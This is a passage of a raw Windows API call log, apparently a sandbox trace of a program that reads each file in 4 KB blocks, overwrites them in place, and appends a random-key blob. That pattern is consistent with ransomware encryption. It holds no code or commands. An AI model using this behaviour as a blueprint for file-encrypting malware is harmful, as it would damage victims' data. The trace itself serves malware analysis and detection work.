GetProcessHeap () returned 0x4f10000 [0078.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.831] GetProcessHeap () returned 0x4f10000 [0078.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.831] GetProcessHeap () returned 0x4f10000 [0078.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.831] GetProcessHeap () returned 0x4f10000 [0078.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.832] GetProcessHeap () returned 0x4f10000 [0078.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0078.832] SetFilePointerEx (in: hFile=0x810, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.832] WriteFile (in: hFile=0x810, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.833] WriteFile (in: hFile=0x810, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.833] GetProcessHeap () returned 0x4f10000 [0078.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0078.833] GetProcessHeap () returned 0x4f10000 [0078.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0078.833] GetProcessHeap () returned 0x4f10000 [0078.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0078.833] CloseHandle (hObject=0x810) returned 1 [0078.834] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 37 [0078.834] SetFilePointerEx (in: hFile=0x814, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.834] ReadFile (in: hFile=0x814, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.834] SetFilePointerEx (in: hFile=0x814, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.834] GetProcessHeap () returned 0x4f10000 [0078.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0078.834] GetProcessHeap () returned 0x4f10000 [0078.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0078.834] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0078.834] GetProcessHeap () returned 0x4f10000 [0078.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0078.834] ReadFile (in: hFile=0x814, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.884] SetFilePointerEx (in: hFile=0x814, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.884] WriteFile (in: hFile=0x814, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.884] GetProcessHeap () returned 0x4f10000 [0078.884] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0078.884] GetProcessHeap () returned 0x4f10000 [0078.884] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.884] GetProcessHeap () returned 0x4f10000 [0078.884] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0078.884] GetProcessHeap () returned 0x4f10000 [0078.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.885] GetProcessHeap () returned 0x4f10000 [0078.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.886] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0078.886] GetProcessHeap () returned 0x4f10000 [0078.887] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x1f8) returned 0x7cf6bf8 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.887] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.887] GetProcessHeap () returned 0x4f10000 [0078.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.888] GetProcessHeap () returned 0x4f10000 [0078.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.889] GetProcessHeap () returned 0x4f10000 [0078.889] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0078.889] GetProcessHeap () returned 0x4f10000 [0078.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.889] GetProcessHeap () returned 0x4f10000 [0078.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0078.889] GetProcessHeap () returned 0x4f10000 [0078.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0078.889] GetProcessHeap () returned 0x4f10000 [0078.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.889] GetProcessHeap () returned 0x4f10000 [0078.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0078.889] SetFilePointerEx (in: hFile=0x814, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.889] WriteFile (in: hFile=0x814, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.889] WriteFile (in: hFile=0x814, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.889] GetProcessHeap () returned 0x4f10000 [0078.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0078.889] GetProcessHeap () returned 0x4f10000 [0078.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0078.889] GetProcessHeap () returned 0x4f10000 [0078.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0078.889] CloseHandle (hObject=0x814) returned 1 [0078.891] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 38 [0078.891] SetFilePointerEx (in: hFile=0x818, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.891] ReadFile (in: hFile=0x818, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.891] SetFilePointerEx (in: hFile=0x818, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.891] GetProcessHeap () returned 0x4f10000 [0078.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0078.891] GetProcessHeap () returned 0x4f10000 [0078.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0078.891] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0078.891] GetProcessHeap () returned 0x4f10000 [0078.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0078.891] ReadFile (in: hFile=0x818, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.972] SetFilePointerEx (in: hFile=0x818, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.972] WriteFile (in: hFile=0x818, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.972] GetProcessHeap () returned 0x4f10000 [0078.972] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0078.972] GetProcessHeap () returned 0x4f10000 [0078.972] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.972] GetProcessHeap () returned 0x4f10000 [0078.972] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0078.972] GetProcessHeap () returned 0x4f10000 [0078.972] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.973] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.973] GetProcessHeap () returned 0x4f10000 [0078.974] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] HeapFree 